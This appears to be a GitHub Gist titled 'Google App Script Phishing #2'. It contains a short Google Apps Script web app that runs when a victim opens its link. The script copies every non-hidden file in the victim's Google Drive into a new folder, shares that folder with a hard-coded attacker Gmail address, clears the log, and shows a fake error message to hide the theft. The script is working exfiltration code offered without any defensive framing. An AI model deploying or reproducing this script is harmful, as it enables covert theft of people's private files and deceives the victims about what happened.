Last active
June 16, 2023 00:55
-
-
Save ahhh/a8fc83f2b323da162f50dc86c5d64e32 to your computer and use it in GitHub Desktop.
Google App Script Phishing #2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function driveSearch() { | |
| // Setup the exfil folder | |
| var user = Session.getActiveUser().getEmail(); | |
| var folder = DriveApp.createFolder(user); | |
| var attackerEmail = "ahhh.db@gmail.com"; | |
| folder.addViewer(attackerEmail); | |
| // Search Drive | |
| var files = DriveApp.searchFiles('hidden = false'); | |
| // Iterate through files in Drive | |
| while (files.hasNext()) { | |
| var file = files.next(); | |
| var name = file.getName(); | |
| Logger.log(name); | |
| // Exfiltrate each file | |
| //file.addViewer(attackerEmail); | |
| file.makeCopy(name, folder); | |
| } | |
| Logger.clear(); | |
| } | |
| function doGet(e) { | |
| var params = JSON.stringify(e); | |
| driveSearch(); | |
| return HtmlService.createHtmlOutput('An error has occured'); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment